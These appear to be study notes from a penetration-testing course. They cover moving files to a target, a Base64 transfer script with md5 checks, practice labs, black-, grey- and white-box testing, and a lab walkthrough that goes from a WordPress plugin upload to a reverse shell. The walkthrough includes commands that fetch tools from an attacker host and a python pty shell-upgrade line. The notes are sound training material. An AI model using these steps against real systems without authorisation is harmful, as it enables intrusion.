HTB CPTS: Study session (Transferring files, Knowledge sources, Vulnerable Machines and apps, Reverse shell)

Transferring files
- During any penetration testing exercise, it is likely that we will need to transfer files to the remote server.
There are a few options for this:
- Run a Python HTTP server on our machine and then use wget or cURL to download the file on the remote host.
- Use scp when we have SSH access to the target.
- When a firewall blocks those connections, encode the file with Base64, paste the text into the shell we already have, and decode it on the target.
To validate that the transfer was successful, we compare the hash of the file on the target machine and on our machine with
md5sum <file>. Matching hashes confirm the copy is complete and uncorrupted; this is an integrity check, not proof of the file's authenticity.
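The Base64 fallback and the md5sum check, simulated end to end on one machine, as an added example that is not part of the original notes. The attacker/target IPs and file names in the comments are assumptions; the sample payload is constructed inline.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): the Base64 fallback transfer
# with an md5sum check, simulated locally end to end.
#
# The usual paths first, for reference (IPs and paths are assumptions):
#   attacker$ python3 -m http.server 8000
#   target$   wget http://10.10.14.5:8000/tool.sh
#   target$   curl -o tool.sh http://10.10.14.5:8000/tool.sh
#   attacker$ scp tool.sh user@10.10.10.20:/tmp/tool.sh
# When a firewall blocks those, paste Base64 text through the shell we
# already have and decode it on the target. The functions below do that.

# Attacker side: turn a file into one Base64 line that is safe to paste.
# (base64 | tr -d '\n' instead of the GNU-only base64 -w0, for portability.)
encode_for_paste() {
    base64 "$1" | tr -d '\n'
}

# Target side: rebuild the file from the pasted text. $1 = text, $2 = output path.
decode_from_paste() {
    printf '%s' "$1" | base64 -d > "$2"
}

# Both sides: print the md5sum of each copy and fail if they differ.
# md5sum catches truncation or corruption in transit; it does not prove
# authenticity, so it is an integrity check and nothing more.
verify_transfer() {
    local src_hash dst_hash
    src_hash=$(md5sum "$1" | cut -d' ' -f1)
    dst_hash=$(md5sum "$2" | cut -d' ' -f1)
    printf 'local:  %s\nremote: %s\n' "$src_hash" "$dst_hash"
    [ "$src_hash" = "$dst_hash" ]
}

# Round trip on a constructed sample file; returns 0 only if the hashes match.
demo_base64_roundtrip() {
    local work src dst b64 rc
    work=$(mktemp -d)
    src="$work/tool.sh"
    dst="$work/tool_on_target.sh"
    printf '#!/bin/sh\nid\nuname -a\n' > "$src"   # constructed sample payload
    b64=$(encode_for_paste "$src")
    decode_from_paste "$b64" "$dst"
    if verify_transfer "$src" "$dst"; then rc=0; else rc=1; fi
    rm -rf "$work"
    return "$rc"
}

demo_base64_roundtrip
```

On a real engagement the output of encode_for_paste is what you copy into the target's shell, followed by the decode_from_paste command; run md5sum on both ends and compare by eye before executing anything you transferred.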
Vulnerable Machines and Applications
Here’s a list of vulnerable machines/apps that are safe to train on:
| Machine/App | Description |
| --- | --- |
| OWASP Juice Shop | A modern vulnerable web application written in Node.js, Express, and Angular which showcases the entire OWASP Top Ten along with many other real-world application security flaws. |
| Metasploitable 2 | A purposefully vulnerable Ubuntu Linux VM that can be used to practice enumeration, automated, and manual exploitation. |
| Metasploitable 3 | A template for building a vulnerable Windows VM configured with a wide range of vulnerabilities. |
| DVWA | A vulnerable PHP/MySQL web application showcasing many common web application vulnerabilities with varying degrees of difficulty. |
Blog
A good blog to visit from time to time is https://0xdf.gitlab.io/
Websites to train Windows Powershell and Linux Terminal
Worth checking: Under The Wire and Over The Wire. You can also practice Bash and PowerShell scripting there.
Types of Pentesting
There are 3 main types of pentesting
| Engagement | Description |
| --- | --- |
| Black-Box | Low level to no knowledge of a target. The penetration tester must perform in-depth reconnaissance to learn about the target. This may be an external penetration test where the tester is given only the company name and no further information such as target IP addresses, or an internal penetration test where the tester either has to bypass controls to gain initial access to the network or can connect to the internal network but has no information about internal networks/hosts. This type of penetration test most closely simulates an actual attack but is not as comprehensive as other assessment types and could leave misconfigurations/vulnerabilities undiscovered. |
| Grey-Box | In a grey-box test, the tester is given a certain amount of information in advance. This may be a list of in-scope IP addresses/ranges, low-level credentials to a web application or Active Directory, or some application/network diagrams. This type of penetration test can simulate a malicious insider or show what an attacker can do with a low level of access. In this scenario, the tester will typically spend less time on reconnaissance and more time looking for misconfigurations and attempting exploitation. |
| White-Box | In this type of test, the tester is given complete access. In a web application test, they may be provided with administrator-level credentials, access to the source code, build diagrams, etc., to look for logic vulnerabilities and other difficult-to-discover flaws. In a network test, they may be given administrator-level credentials to dig into Active Directory or other systems for misconfigurations that may otherwise be missed. This assessment type is highly comprehensive as the tester will have access to both sides of a target and perform a comprehensive analysis. |
- It is essential to get in the habit of taking extensive notes and saving all console output early on. The better we get at this while practicing, the more second nature it will become when on real-world engagements. Proper notetaking is critical for us as penetration testers and will significantly speed up the reporting process and ensure no evidence is lost.
Reverse shell cheat sheets
Thoughts after practical exercises
The process of gathering the user and root flags was really cool. I saw the importance of OSINT. I found the password for the admin user of the WordPress dashboard. The whole process looked something like this:
- OSINT
- System enumeration to find sub-URLs and users.
- Log in to the admin account.
- Check which plugins are used by the site.
- Find an exploit that works against one of the plugins.
- Create a malicious PHP payload.
- Upload the PHP payload through the vulnerable MyImages plugin. It does not care whether you upload a jpg, pdf or php.
- With the malicious code uploaded, trigger it to open a reverse shell while listening with netcat.
- We’re in, but a plain web shell is not comfortable to use, so we “summon” bash with Python.
- Locate which version of Python is installed on the target.
- Spawn bash with python3 -c 'import pty; pty.spawn("/bin/bash")'
- You’re in.
OUTRO
Let’s learn more tools. Follow my blog for more.
Try to learn one new thing everyday.